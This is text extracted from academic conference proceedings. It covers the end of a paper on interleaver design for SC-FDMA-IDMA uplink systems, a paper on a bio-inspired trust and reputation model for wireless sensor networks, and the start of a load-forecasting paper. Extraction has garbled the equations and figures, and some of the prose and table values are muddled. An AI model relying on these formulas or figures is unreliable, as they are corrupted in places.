they proposed a way to tie the intersection between interleavers. Defined entry vari-
ables become hard to establish sufficient polynomials for pseudorandom interleavers
as consumer K numbers get greater and applications have to accommodate power
production time or integrated interleavers. The focus of the shifting is on the integra-
tion between the multiple interactions. We therefore want to provide a basic rule for
the construction of interleavers that decreases the memory needed, we need to design
them well so our goal is to create a non-orthogonal interleaver that works again as
a random interleaver and satisfies the two construction methods define and repro-
duce, i.e. A few numbers of input should be transmitted that are efficient to generate
interleaving pattern at the receiver. In this paper, the maximum spread quadratic
permutation polynomial is used to generate random integration of SC-FDMAIDMA
systems.
SC-FDMAIDMA is a multiple access hybrid framework that retains several desir-
able SC-FDMA and IDMA attributes; the output of BER is very close to that of
OFDM-IDMA. In this paper, the reason for the selection of the SC-FDMA-IDMA
method is that it offers very low impact, high access, moderate signal interference
and medium carrying, especially in comparison with IDMA and other equivalents,
like IDMA (OFDM-IDMA) based on orthogonal FDMA in Yadav et al. [6]. The
simple NOMA concept is to support many users in terms of time, frequency, and
space utilizing the same resource. Among the main features considered for the 5G
radio (NR) mobile communication system, non-orthogonal multi-access (NOMA)
was established. NOMA offers a number of assumed desirable advantages, such as
increased spectrum performance, reduced high reliability latency, and tremendous
accessibility. NOMA’s primary use case is to relay uplinks where most user devices
(UE) attempt to use real-time resources, and the same predicted system benefit. The
NOMA system’s potential advantage lies in better spectrum efficiency relative to
conventional orthogonal MA (OMA), where each customer will enjoy a dedicated
transmit service and a dedicated transfer service and a request for resource allocation
and reference and for secure transmission presented by Lai et al. [7]. Such feature
is critical for low latency communication systems (URLLC). Such codes may or
may not reflect the specified structure. NOMA spreadable schemes can be collected
under short and long spreading strategies. Shared access for multiple users (MUSA)
can be considered as an example of a short distribution system for NOMA where
a predefined set of non-orthogonal sequences is used as a method of user replica-
tion as in [8]. A key feature of the IDMA policy lies in the fact that it does not deal
with disturbances perceived as additional noise. During the acquisition process, a
priori LLR continues to be developed by updating the relevant signal statistics and
distortions. There has been a baseline evaluation of SC-FDMA-IDMA in the litera-
ture [8–10]. Section 2 include the interleaver designing, Sect. 3 explains the system
model of SC-FDMA-IDMA system, Sect. 4 shows the simulation results, and last
section concludes the paper.
Efficient Interleaver Design for SC-FDMAIDMA Systems 561

2 Interleaver Design

The design theory of efficient interleavers is to begin with the initialization of an


interleaver as a master interleaver from which the family of interleavers is created by
deterministic order reading of the interleaver indices, [11]. The process of generation
can be described as follows:
(1) In IR rows and ICN columns, construct a length N single-dimensional interleaver
and write the master interleaver row-wise interleaver indices into a matrix as
in Table 1 where IR · ICN = N.
(2) The initial row of matrix is generated by permutation polynomials [12] given
below

22k−1 = IC N (1)

We have obtained the value of k from the above Eq. 1 and use it in the Eq. 2
to find the initial interleaver
 k  
f (x) = 2 − 1 x + 2k+1 x 2 mod 22k−1 (2)

(3) For applying permutation in column indices here we let the initial interleaver
pattern (3,1,4,0,2,5) obtained from (2) is divided by R and remainder of each
element give the first row and next rows are generated by rotation shown in
Table 2. Storage in the column indices after the permutation shown by Table 3
(4) For row permutation, begin with initial interleaver, and other rows of the matrix
are generated by a simple one-step cyclic shifting of the previous interleaving
pattern such as in Table 4 and the last Table 5 shows the final storage in matrix
after the row permutation.
(5) A first row of the interleaver for user k is formed by cyclic shifting Sk steps of
the initial interleaver where int(S) = ICN /k is the changing unit step and int(S)
returns the maximum whole number that is not greater than s. For example,
data information bits m = 8, spreading factor sl = 3 chip length (m*sl = N =
IR * ICN ) = 24.
Let, IR = 4, ICN = 6, IR * ICN = 24, K = 3 and
S (6/3) = 2, S*k = 0, 2, 4 for k = 0, 1, 2.
Table 1 shows the initialization of the matrix of length N = 24.
Interleaving bit sequence for the user 1 is.
1 = 3,7,16,18,2,11,13,22,0,8,17,9,4,6,14,23,15,19,12,20,5,21,1,10.
First row for row permutation for user 2 = 4,0,2,5,3,1
First row for column permutation for user2 = 0,0,2,1,3,1
2 = 22,0,14,11,9,1,6,20,17,15,7,4,2,23,21,13,10,12,5,3,19,16,18,8
First row for row permutation for user 3 = 2,5,3,1,4,0
First row for column permutation for user 3 = 2,1,3,1,0,0
3 = 20,5,9,7,4,12,11,15,13,10,18,2,21,19,16,0,8,17,1,22,6,14,23,3.
562 R. Agarwal and M. K. Shukla

Table 1 Initialization of the matrix


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 0 1 2 3 4 5
IR = 1 6 7 8 9 10 11
IR = 2 12 13 14 15 16 17
IR = 3 18 19 20 21 22 23

Table 2 Pattern of permutation for the column


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 3 1 0 0 2 1
IR = 1 0 2 1 1 3 2
IR = 2 1 3 2 2 0 3
IR = 3 2 0 3 3 1 0

Table 3 Storage following permutation of the column


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 18 7 2 3 16 11
IR = 1 0 13 8 9 22 17
IR = 2 6 19 14 15 4 23
IR = 3 12 1 20 21 10 5

Table 4 Pattern for row


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 3 1 4 0 2 5
IR = 1 1 4 0 2 5 3
IR = 2 4 0 2 5 3 1
IR = 3 0 2 5 3 1 4

Table 5 Storing after the permutation row


Example ICN = 0 ICN = 1 ICN = 2 ICN = 3 ICN = 4 ICN = 5
IR = 0 3 7 16 18 2 11
IR = 1 13 22 0 8 17 9
IR = 2 4 6 14 23 15 19
IR = 3 12 20 5 21 1 10
Efficient Interleaver Design for SC-FDMAIDMA Systems 563

3 SC-FDMA-IDMA System Model

In this article we consider k number of users in a spread spectrum communication


system at the transmitter side and the data (each user data length is m) of all the
users are spread by the same length sl of spreading sequence, so different Users
can be separated from each other by different chip sequence for the different user
(each data is interleaved by different chip sequence) spread data is denoted by “chip”
instead of “bit” so chip length is equal to(m*sl). Data symbols are converted into
frequency domain by Mpoint DFT. Following subcarrier mapping, modulated data
symbols are mapped on subcarriers, and then, the transformation of these modulated
subcarriers from frequency-domain samples to time-domain samples, [13], is done
by IFFT block. All the signals are superimposed and transmitted by a single antenna.
We consider a AWGN channel with zero mean and variance σ2 at the receiver as
shown in Fig. 1 block diagram of the receiver after DFT- De subcarrier mapping and at
the output of the IDFT block chip by chip detection algorithm is applied this is done
in two steps in first step extrinsic LLR ratios are generated by elementary signal
estimator(eESE ) and decoder(eDEC ) Extrinsic log-likelihood ratios (LLRs) around
{xk(j)} are the outputs of the ESE and DECs, defined as the ratios are given as [14]:
 
pr (xk ( j) = +1)
e(xk ( j)) = log k; j
pr (xk ( j) = −1)

In next step, through the feedback path, these ratios are continuously updated
between the iteration process and an estimate of correct received bits is obtained.

c
noise(AWGN)
Subcarrier
User-1 d1*sl П1 DFT Mapping IDFT

Subcarrier
DFT
User-k dk*sll Пk Mapping IDFT

П1
User-1 DEC FFT
APP
П1
ESE Subcarrier
eESE(x(j) IDFT
De-Mapping

DEC Пk
User-k
APP
Пk
eDEC(xj)

Fig. 1 Transmitter and receiver structure of SC-FDMA-IDMA scheme in Agarwal and Shukla [15]
564 R. Agarwal and M. K. Shukla

4 Simulation Result

MATLAB simulation is used to conduct the performance study of uncoded SC-


FDMA-IDMA. The proposed successful interleaver requires a minimum number of
input parameters between all interleavers, which imply a very easy implementation
of software or hardware, as well as a limited memory requirement. The bit error
output of the SC-FDMA-IDMA framework simulated by the suggested interleaver,
random interleaver, power interleaver, and tree-based interleaver by Shukla et. al. [16]
is shown in Fig. 2. For all the simulations, we had considered the same parameters
such as the number of users n = 16, block = 50, number of iteration performed
= 5, data length = 512, and spreading length = 16. Figure 2 demonstrates that
the bit error rate performance obtained by proposed interleaver is better than the
other interleaver and is almost similar to the random interleaver, and Fig. 3 shows
the comparison of BER performance with varying number of users with proposed
interleaver under same parameters as simulated for Fig. 2. Figure 3 shows as the
number of users increases it require more energy per bit to achieve zero bit error
rate that is due to load increases on the system. Figure 4 illustrates the comparison
between the SC-FDMA-IDMA method and the other OFDM-IDMA method with
the suggested interleaver system, initially bit error rate is same in both the scheme
but after 5 dB Eb/No BER is decreasing and at 10–2 bit error rate is obtained at

0
10

tree based interleaver


-1
10 random interleaver
power interleaver
Proposed interleaver (MS)

-2
Bit Error Rate (BER)

10

-3
10

-4
10

-5
10

-6
10
2 4 6 8 10 12 14 16 18 20
Eb/No (in dB)

Fig. 2 Bit error rate performance with numerous interleavers of the SC-FDMA-IDMA scheme (n
= 16, block = 50, iteration = 5)
Efficient Interleaver Design for SC-FDMAIDMA Systems 565

0
10
SC-FDMA-IDMA(lfdma),q=2,n=16,it=5block=50
-1 SC-FDMA-IDMA,n=8,it=5
10 SC-FDMA-IDMA,n=4,it=5,block=50

-2
10
Bit Error Rate

-3
10

-4
10

-5
10

-6
10
-4 -2 0 2 4 6 8
Eb/No

Fig. 3 SC-FDMA-IDMA scheme performance for separate user numbers (n = 4, 8, 16)

0
10

-1
10

-2
10
Bit Error Rate

-3
10

-4
10

-5
10
OFDM-IDMA,q=2,n=16,it=5block=50
-6 SC-FDMA-IDMA(lfdma),q=2,n=16,it=5block=50
10
2 4 6 8 10 12 14
Eb/No

Fig. 4 Compare the SC-FDMA-IDMA BER performance to other OFDM-IDMA systems under
the same simulation parameters
566 R. Agarwal and M. K. Shukla

5.8 dB for SC-FDMA-IDMA scheme and for same bit error rate OFDM-IDMA it
required 11 dB. From Fig. 4, we can say that for the SC-FDMA-IDMA scheme with
proposed interleaver, lower bit energies are required for transmission than OFDM-
IDMA scheme. All the simulations are done with assuming data bit = 512, sl = 16,
chip length = 8192, n (users) = 16 consider ICN = 512 so IR = 16 with random
interleaver (14*8196*5 = total bits required)huge memory is required at the base
station,in tree-based interleaver 2 orthogonal interleaver are required to generate
other interleaver but with proposed efficient interleaver required only(10 + 16*5
= total bits)we have to send only values of r, and n from these values all other
interleavers are generated. For.

5 Conclusions

A novel method is suggested in this paper to generate efficient interleaver that has
less memory storage requirement with less complexity. Simulation results show that
the proposed interleaver integrated with the SC-FDMA-IDMA scheme makes this
scheme highly recommended for uplink communication particularly for the 5G non-
orthogonal multiple access.

References

1. Ping, L., Liu, L., Wu, K., & Leung, W. K. (2006). Interleave-division Multiple-access. IEEE
Transactions on Wireless Communication, 5(4), 938–947.
2. Kusume, K., & Bauch, G. (2008). Simple construction of multiple interleavers: Cyclically
shifting a single interleaver. IEEE Transactions on Communications, 56(9) 1394–1397s.
3. Ping, L., Liu, L., Wu, K., & Leung, W. K. (2003). A simple approach to near-optimal
multiuser detection: interleave-division multiple-access. In IEEE Wireless Communications
and Networking Conference, WCNC 2003 (vol. 4, no. 1, pp. 391–396).
4. Wu, S., Chen, X., & Zhou, S. (2009). A parallel interleaver design for IDMA systems. In
2009 International Conference on Wireless Communications & Signal Processing, Nanjing
(pp. 1–5). Shuang Wu.
5. Pupeza, Kavcic, A., & Ping, L. (2006). Efficient generation of interleavers for IDMA. In IEEE
International Conference on Communications, ICC 2006 (vol. 4, pp. 1508–1513).
6. Yadav, M., Gautam, P. R., Shokeen, V., et al. (2017). Modern Fisher-Yates shuffling based
random interleaver design for SCFDMA-IDMA systems. Wireless Personal Communications,
97, 63–73.
7. Lai, K. , Wen,L., & Lei, J., et al. (2019). Secure transmission with interleaver for uplink sparse
code multiple access system. IEEE Wireless Communications Letters, 8( 2), 336–339.
8. Haghighat, A., Nazar, S. N., Herath ,S., & Olesen, R. (2017). On the performance of
IDMA-Based Non-Orthogonal multiple access schemes. In IEEE 86th Vehicular Technology
Conference (VTC-Fall) (pp. 1–5), Toronto.
9. Hamdoun, H., Nazir, S., Alzubi, & Laskot, P. (2020). Performance benefits of network coding
for HEVC video communications in satellite networks, Iranian Journal of Electrical and
Electronic Engineering, 17(3), 1–11.
Efficient Interleaver Design for SC-FDMAIDMA Systems 567

10. Xiong, X., & Luo, Z.: SC-FDMA-IDMA: A hybrid multiple access scheme for LTE Uplink. In
7th International Conference on Wireless Communications, Networking and Mobile Computing
(pp. 1–5), Wuhan.
11. Hao, D., & Hoeher, P. A. (2008). Helical interleaver set design for interleave-division
multiplexing and related techniques. IEEE Communications Letters, 12(11), 843–845.
12. Takeshita, O. Y. (2007). Permutation polynomial interleavers: an algebraic-geometric perspec-
tive. IEEE Transactions on Information Theory, 53(6), 2116–2132.
13. Yadav, M., Shokeen, V., & Singhal, P. K. (2019). Flip Left-to-Right approach based inverse
tree interleavers for unconventional integrated OFDM-IDMA and SCFDMA-IDMA systems.
Wireless Personal Communications, 105, 1009–1026.
14. Hao, W., Ping, L., & Perotti, A. (2006). User-specific chip-level interleaver design for IDMA
systems. IEEE Electronic Letters, 42(4), 233–234.
15. Agarwal, R., & Shukla, M. (2017). SC-FDM-IDMA scheme employing BCH Coding.
International Journal of Electrical and Computer Engineering (IJECE), 7(2), 992–998.
16. Shukla, M., Srivastava, V., & Tiwari, S. (2008). Analysis and design of Tree Based Interleaver
for multiuser receivers in IDMA scheme. In 16th IEEE International Conference on Networks,
pp. 1–4, New Delhi.
Enhanced Bio-inspired Trust
and Reputation Model for Wireless
Sensor Networks

Vivek Arya, Sita Rani, and Nilam Choudhary

Abstract Today, WSNs are spread in both industry and academia; they are focusing
their research efforts in order to enhance their appliances. One of the first concerns
to solve in order to acquire that expected enrichment is to assure relieve a minimum
level of security in such a prohibitive environment. This study concentrates on trust
and reputation system management. The proposed approach titled enhanced bio-
inspired trust and reputation model (EBTRM) is Bio-inspired extending Trust and
Reputation Model. The aim of the proposed algorithm is to provide an adequate
security solution to collusion network of BTRM, which can provide a high level of
security and energy preserving ability

Keywords Wireless sensor networks · Security · Trust and reputation system ·


BTRM · Accuracy · Path length and energy consumption

1 Introduction

In last few years, researchers and scientists pay more attention to the area of WSNs
[1]. WSNs are composed of large number of sensor nodes. These sensor nodes are
small in size and battery powered [2, 3]. In WSNs, sensor node senses the data,
collect, process and transmit the data to other nodes to complete a task in distributed
manner. In WSNs [4, 5], result is based on sensor nodes cooperation. WSNs use
wide variety of applications, for example, industrial process control, ecological and
habitat monitoring, home automation, health care system, weather forecasting, traffic
control, etc. Generally, WSNs are deployed in an outdoor environment, where the

V. Arya (B)
Department of ECE (FET), Gurukula Kangri (Deemed To Be University), Haridwar 249404, India
S. Rani
Department of Computer Science and Engineering, Gulzar Group of Institutes, Khanna, Punjab
141401, India
N. Choudhary
Department of CSE, JECRC, Jaipur, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 569
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_46
570 V. Arya et al.

possibility of an adversary [6] always more than in an indoor environment. These


malevolent nodes may transmit wrong information in the network; due to malevolent
nodes the performance of the system is decreased. There are a lot of techniques or
method to detect a malicious nodes in the WSNs, and cryptography is one of the tech-
niques which protect our network from attacks or malevolent nodes. Major drawback
of cryptography technique is complex computation [7]. Trust and reputation model
(TRM) is a creative solution for sustaining a lowest security level between two
objects having transactions and interactions with in dispersed system. Many trust
and reputation models were introduced in the past. Some models provide cluster
head selection, secure routing, data aggregation and synchronized trust management
[8–10]. In the fraudulent environment, malevolent node assigns maximum value to
the malevolent node and minimum value to the benevolent node [11]. In current
era, the need of hour is to enhance the data rate and security over the network. For
data rate enhancement, we generally apply data compression techniques [12–17].
We proposed enhanced bio-inspired trust and reputation system which increases the
security level. Our proposed approach is presented, and a performance comparison
between our model and the original one is carried out, followed by conclusion and
future work.

2 Trust and Reputation System

Trust and reputation system (TRS) management is a creative solution for sustaining a
lowest security level between two objects having transactions or interactions within
a distributed system. Trust is a particular level of the subjective possibility with
which an agent will perform a particular action, while a reputation is an expectation
about behavior of an agent based on information about it or considerations of its
prior behavior. In most cases, these two conditions are distinguished definitely and
could be used changeably. In WSNs transactions, if we define the sensors asking for
services as client sensors and sensors providing services as server sensors, then the
client sensors will find out whether to have transactions with a server sensor based
on its trustworthiness or reputation. Trust and reputation model is usually composed
of five components: gathering info, scoring and ranking, selecting objects, having
transaction and reward or punishment. Gathering information, the first element of a
trust and reputation system, is responsible for collecting behavioral information about
other objects, for example, peers, agents or paths. The information collected might
come from different objects. It could be absolute observation or own experience or
information provided by nodes. Once information about an object has been perfectly
assemble and weighed, and a reputation score is then estimated and given base on
certain algorithm. The main aim of this process is to provide the clients a determinable
approach to decide which server node is most trustworthy. The next step is that a
client selects the most trustworthy or reputable server object in the society providing
certain applicability, and then, adequately has intercommunication with it. After
receiving the service provided, the client will access the result and give a score of
Enhanced Bio-inspired Trust and Reputation Model … 571

satisfaction. Based on the satisfaction occurred, the final step, punishing or rewarding,
is carried out. If a server node is unsuccessful in making the client satisfied with
service provider, its reputation score will be affected, and the client is less likely to
have transaction with it again.

3 Bio-inspired Trust and Reputation Model (BTRM)

BTRM-WSN [18] carries out the selection of the most trustworthy node through the
most reputable path offering a certain service. It is based on bio-inspired algorithm
called ant colony system (ACS), where ants form paths in order to fulfill some condi-
tions graphically. Pheromone traces of ants that help coming ants to discover and
come from those paths. These pheromone values will help ants to discover the optimal
path solutions since the optimal path will have the maximum amount of pheromone
value. When we apply this ACS algorithm on to trust and reputation system, trust-
worthiness of sensors is represented by pheromone value. In this BTRM-WSN, each
sensor node holds contains pheromone traces for its neighbors (τ ∈ [0, 1]), which
find out possibility for an ant to select a path as well as the sensor the path leading
to as a solution. In other words, τ can be considered as the trust that a sensor gives
another. The steps of algorithm of BTRM are as follows:

3.1 Gathering Information

A set of imitation ants are developed, and then, they leave the client sensor. When
an ant proceeds from a node i to node j, it gives an instruction for these two sensor
nodes to improve the pheromone value of the path between them through Eqs. (1)
and (2),

τi j = (1 − ϕ). τi j + ϕ.  (1)

   
 = 1 + (1 − ϕ). 1 − τi j . ηi j (2)

τi j is the pheromone value of the path between sensor i and sensor j,  is the
convergence value of τi j and ϕ is a parameter controlling the amount of pheromone
left by the ants.
When ant moving in a network searching for the most trustworthy path to the
server providing good service, each ant must decide whether to stop and return the
solution to the client or continue to discover another one, based on the reputability
of the server that is discovered. When ant k reaches at sensors, server situations
may occur. The first is that sensor s has more neighbors not visited by ant k; then,
k estimates average pheromone value (τk ) of the path come next by ant k from the
572 V. Arya et al.

client until the sensor s. If τk is greater than described transition threshold TraTh
(transition threshold), then ant k stops and returns the solution or vice versa. Another
situation is that s does not provide any services. If sensor s has more neighbors not
visited by ant k, then k decides the next node to move. If sensor s has visited all the
neighbors, then ant k reaches a dead end. It has to go back to the route that it has
form until it reaches at sensor offering the requested service, a sensor not offering
the requested service but having more neighbors not visited yet [19].

3.2 Score and Rank

Client will test and determine the quality of the solution brought back by each
launched ant. The quality of path could be computed by Eq. (3),

τk
Q (Sk ) = .%Ak (3)
Length(Sk )PLF.

τi j is the pheromone value of the path between sensor i and sensor j;  is the
convergence value of τi j and ϕ is an amount of pheromone traces left by ants. Sk
designates the solution brought back by ant k. Q(Sk ) defines the quality of path Sk ; τk
designates the average path pheromone of path Sk found by ant k; PLF ∈ [0, 1] define
a path length factor and % Ak denote the percentage of ants that have selected the same
solution as ant k. After estimating the path quality of all solution brought back by ants,
the client selects the path with maximum score and collect it as Current_Best solution.
Then, the client compares the route quality with the best solution (Global_Best) found
by earlier transactions. If Current_Best solution is even better, then the client will
take the place of the previous Global_Best with the Current_Best solution. Then, an
extra ant is sent to improve the pheromone value of the current Global_Best.

3.3 Ants Transaction

After the client selects the Global_Best solution, it will have transaction with the
selected sensor. It with the default service which the client expects to obtain, after
receiving the service. There might be two conditions: first, the selected server sensor
might be completely trustworthy and provide the accurate service as it is assumed to
or it could be totally malicious and provide highly difference service. In the earlier
condition, the client is convinced and will give a satisfaction value (Sat) is find out as
an irregular number between PunTh and 1; while in the last condition, the satisfaction
value (Sat) is found out as an irregular number between 0 and PunTh as the client is
considered as unsatisfiable. PunTh is predefined punishment threshold value.
Enhanced Bio-inspired Trust and Reputation Model … 573

3.4 Punish and Reward

A client will demand the desired service to what it objects to be the most reputable
server through the most trustworthy path. Then, punish or reward will be given to
all connection in this path based on whether the client is satisfied with the service
provided by the server. This is done by increasing or decreasing the pheromone value
of the path [20–23].

4 Enhanced Bio-inspired Trust and Reputation Model

This section introduced an enhanced bio-inspired trust and reputation system inspired
by BTRM tested in prior section. In EBTRM algorithm, we modify the parameters
values of bio-inspired algorithm. Flow chart and improvements in BTRM algorithm
(EBTRM) are as shown in Fig. 1.

4.1 EBTRM Algorithm

As described in earlier, the criterion that BTRM-WSN used to determine whether


a sensor is trustworthy is the value of the solution route from the client sensor to
the selected sensor. Similarly, the quality of each solution is estimated based on the
value of average pheromone. This approach has been proven to be effective, and the
performance of this system may get improved if the condition of the server sensors
could be taken into account and examine modify some aspects of the original system.
In the first modification, we try to make system secure, we should need to increase
path quality of the system, so, we enhance security of system. In EBTRM algorithm,

τk
Q (Sk ) = .%Ak
Length (Sk )

where PLF = 1, we have selected those paths, which are as short as possible. In
second modification, we enhance the radio range and take the radio range maximum
because maximum radio range provides security. Suppose, two nodes communicate
with each other, if radio range is maximum then they can directly communicate but
its range is minimum then they cannot communicate directly with each other and
possibility of interference of malicious node is increased. The last modification is
in the value of qo (= 0.6335), and the possibility of choosing deterministically the
most trustworthy next node is increased which increases the accuracy of the system.
574 V. Arya et al.

START

Initialized Number of Best Path


Sensor

Q(Sk) > NO
Q(Current Best ) Wait for Timeout
Expire

Yes

Current Best Sk Num Returned Ants <


% of Number of Ants

Q(Current _Best) > NO Pheromone


Q(global _Best) Local Updating

Yes
End
Pheromone
Global Updating

End

Fig. 1 Flow chart of EBTRM

5 Simulation Results

In our proposed work, we consider ten networks composed of 10–100 sensor nodes,
each for 10 executions in two-dimensional areas. Sensor nodes in a cluster with
particular radio range transmit the data to the cluster head and then to the base
station within the entire network. In collusion network, every malicious node will give
the maximum rating for every other malicious node and minimum rating for every
benevolent one. We used Java based event driven TRMSim—WSN [24] simulator
version 0.5 for WSNs allowing the researchers to simulate and represent random
network distributions and provide statistics of different data dissemination policies
including the provision to test the different strategies of trust and reputation models.
Many networks like collusion, oscillating and dynamic networks, the percentage
of nodes, malicious nodes and so forth, can be implemented and tested over it. In
our experiment, we concentrated on collusion network and enhance the accuracy of
Enhanced Bio-inspired Trust and Reputation Model … 575

Table 1 Parameters of
Parameters BTRM values EBTRM values
BTRM and EBTRM
Phi 0.01 0.01
Rho 0.87 0.87
q0 0.45 0.6335
Num ants 0.35 0.35
Num iterations 0.59 0.59
Alpha 1.0 1.0
Beta 1.0 1.0
Initial pheromone 0.85 0.85
Punishment threshold 0.48 0.48
Path length factor 0.71 1
Transition threshold 0.66 0.66
Radio range 12 m 50 m

BTRM algorithm in collusion network. Table 1 shows the simulation parameters of


BTRM and EBTRM algorithms.
TRMSim-0.5 WSN is a Java-based trust and reputation models simulator aiming
at providing easy way to test a trust and reputation model (BTRM) over WSNs
and to compare it with EBTRM. We design a WSN template using the network
parameter settings in TRM-WSN as: clients = 15%, number of nodes = 100, number
of networks = 10, number of executions = 10. Then, the simulator will randomly
create WSN for experiments based on this template.

5.1 Accuracy with Varying Number of Malicious Nodes

In our work, we have used the concept of accuracy to evaluate the reliability and
level of security provided by the trust and reputation system is represented by the
percentage that the number of times when it is successfully selected trustworthy
sensors out of the total number of transactions. A better trust and reputation should
have a good control of the negative influence in which the malicious nodes have on
the WSN. Figure 2 shows the comparison of accuracy BTRM and EBTRM algorithm
with varying number of malicious nodes.

5.2 Path Length with Varying Number of Malicious Nodes

Path length is the average hops leading to the most trustworthy sensors which are
selected by the client in a WSN applying certain type of trust and reputation system.
It is assumed that less average path indicates a better performance in efficiency and
576 V. Arya et al.

Fig. 2 Graphical representation of accuracy of BTRM and EBTRM

Fig. 3 Graphical representation of path length of BTRM and EBTRM

easiness in searching for trustworthy sensors of a trust and reputation system. Figure 3
represents path length of BTRM and EBTRM algorithm graphically.

5.3 Energy Consumption with Varying Number of Malicious


Nodes

Energy consumption of the network is the overall energy consumed in: client nodes
sending request messages, server nodes sending response services, energy consumed
Enhanced Bio-inspired Trust and Reputation Model … 577

Fig. 4 Graphical representation of energy consumption of BTRM and EBTRM

by malicious node which provides bad services, relay nodes which do not provide
services, the energy to execute the trustworthy sensor searching process of a certain
trust and reputation system. For WSN, researcher’s major problem is how to effec-
tively reduce energy consumption. Figure 4 shows EBTRM has lowest energy
consumption.

6 Conclusions

Our proposed EBTRM system successfully increases the accuracy in trust and repu-
tation system. Therefore, the level of security of the original BTRM-WSN without
sacrificing its advantages in finding trustworthy sensors efficiently and the extra
amount of energy for those add-ons is acceptable EBTRM is proven to be able
to accurately distinguish benevolent sensor from malicious sensor and thus protect
WSNs from attackers. And most important thing is level of security it provides not
influenced by the number of attackers as much as its two competitors do. When the
network is in a relatively secured status, it becomes more complicated and less energy
efficient to search for trustworthy sensors because of the extra conditioning and
computation overall the modification in BTRM a successful. Our proposed EBTRM
provides better solution to WSNs, where a high level of security is required while
future work will keep on developing the algorithms searching for trustworthy sensors
to improve the easiness in finding trustworthy sensors as well as energy efficiency.
EBTRM provides a higher level of security for WSNs without sacrificing the effi-
ciency of the original approach and does not require huge amount of energy for the
extra consumption.
578 V. Arya et al.

References

1. Farahani, S. (2008). Zig Bee Wireless Networks and Transceivers. Elsevier.


2. Alkalbani, A., Mantoro, T., & Tap, A. O. Md. (2012). Improving the lifetime of wireless sensor
networks based on routing power factors. In Networked Digital Technologies, Communications
in Computer and Information Science (vol. 293, pp. 565–576).
3. Chen, H., Wu, H., Zhou, X., & Gao, C. (2007). Reputation based trust in wireless sensor
networks. In Proceedings of the International Conference on Multimedia and Ubiquitous
Engineering (pp. 603–607).
4. Chong, C. Y., & Kumar, S. P. (2003). Sensor Networks: Evolution opportunities and challenges.
Proceedings of the IEEE, 91(8), 1247–1256.
5. Akyildiz, I. F., Sankarasubramaniam, W. Su., & Cayirci, E. (2002). A survey on sensor
networks. IEEE Communications Magazine, 40(8), 102–114.
6. Hurt, J., Lee, Y., Yoont, H., Choi, D., & Jin, S. (2005). Trust evaluation model for wireless sensor
networks. In Proceedings of the seventh International Conference on Advanced Communication
Technology (pp. 491–496).
7. Jing, Q., Tang, L. Y., & Chen, Z. (2008). Trust management in wireless sensor networks.
Journal of Software, 19(7), 1716–1730.
8. Hur, J., Lee, Y., Hong, S., & Yoon, H. (2005). Trust based secure aggregation wireless sensor
networks. In Proceedings of the third International Conference on Computing, Communications
and Control Technologies (Vol. 3, pp. 1–6).
9. Crosby, G. V., Pissinou, N., & Gadze, J. (2006). A framework for trust based cluster head
election in wireless sensor networks. In Proceedings of the Second IEEE Workshop on
Dependability and Security in Sensor networks and Systems (pp. 13–22).
10. Sun, Y. L., Yu, W., Han, Z., & Liu, K. J. R. (2006). Information theoretic framework of
trust modeling and evaluation for ad-hoc networks. IEEE Journal on Selected Areas in
Communications, 24(2), 305–317.
11. Verma, V. K., Singh, S., & Pathak, N. P. (2014). Collusion based realization of trust and
reputation models in extreme fraudulent environment over static and dynamic wireless sensor
networks. International Journal of Distributed Sensor Networks, Hindawi Publication.
12. Arya, V., & Singh, J. (2016). Image compression algorithm using two dimensional discrete
cosine transform. Journal Interdisciplinary Research(IJIR), 2(8). ISSN: 2454–1362.
13. Arya, V., & Singh, J. (2016). Robust image compression using two dimensional discrete cosine
transform. International Journal of Electrical and Electronics Research, 4(2), (187–192). ISSN
2348–6988 (online).
14. Arya, V., Singh, P., & Sekhon, K. (2016). Medical image compression using two dimensional
discrete cosine transform. International Journal of Electrical and Electronics Research, 3(1),
(156–164). ISSN 2348–6988 (online).
15. Arya, V., Singh, P., & Sekhon, K. (2013). RGB Image cosmpression using two dimen-
sional discrete cosine transform. International Journal of Engineering Trends and Technology
(IJETT), V4(4), 828–832. ISSN:2231-5381.
16. Gupta, O. P., & Rani S. (2013). Accelerating molecular sequence analysis using distributed
computing environment. International Journal of Scientific & Engineering Research–IJSER.
17. Rani, S., & Gupta, O. P. (2016). Empirical analysis and performance evaluation of various GPU
implementations of protein BLAST. International Journal of Computer Applications, 151(7),
22–27.
18. Marzi, H., & Lia, M. (2013). An enhanced bio-inspired trust and reputation model for WSN.
In The fourth International Conference on Ambient Systems, Networks and Technologies
(pp.1159–1166). Elsevier.
19. Marmol, F. et al. (2011). Providing trust in WSNs using a bio-inspired technique (pp. 163–180).
Springer science plus business media
20. Pan, Y., Yu, Y., & Yan, L. (2013). An improved trust model based on interactive ant algorithms
and its applications in wireless sensor networks. International Journal of Distributed Sensor
Networks. Hindwai Publishing Corporation, 2013.
Enhanced Bio-inspired Trust and Reputation Model … 579

21. Karthik, S., Vanitha, K., & Radhamani, G. (2011). Trust Management Techniques in Wireless
Sensor Networks: An Evaluation. IEEE.
22. Dorigo, M., Stuzle, T. (2004). Ant Colony optimization. Bradford Book.
23. Ukil, A. Trust and Reputation Based Collaborating Computing in Wireless Sensor Networks.
In Second International Conference on Computational Intelligence, Modelling and Simulation,
24. Marmol, F. et al. (2009). TRMSim-WSN, trust and reputation models simulator for WSNs. In
IEEE Communication Society.
Analytical Machine Learning
for Medium-Term Load Forecasting
Towards Agricultural Sector

Megha Sharma, Namita Mittal, Anukram Mishra, and Arun Gupta

Abstract The economic growth of any country depends upon available resources
and their proper management. All the sectors, residential, industrial, commercial or
agricultural require sufficient and reliable energy services. Electricity is one of the
most important forms of energy that cannot be replaced by any other energy input. The
agriculture sector has an important role in the process of foodstuff production. The
non-food product also participates in the economy like tobacco and jute. Electricity
plays important role for irrigation in the agricultural sector. Proper management of
the energy consumption for irrigation is required for the utilization of the existing
resources. So, there is a need for predicting the future consumption of electricity in
the agricultural sector. Medium term load forecasting is used for predicting weeks to
years ahead electricity consumption. In the proposed work, statistical and machine
learning based algorithm are used to predict the one year ahead electricity consump-
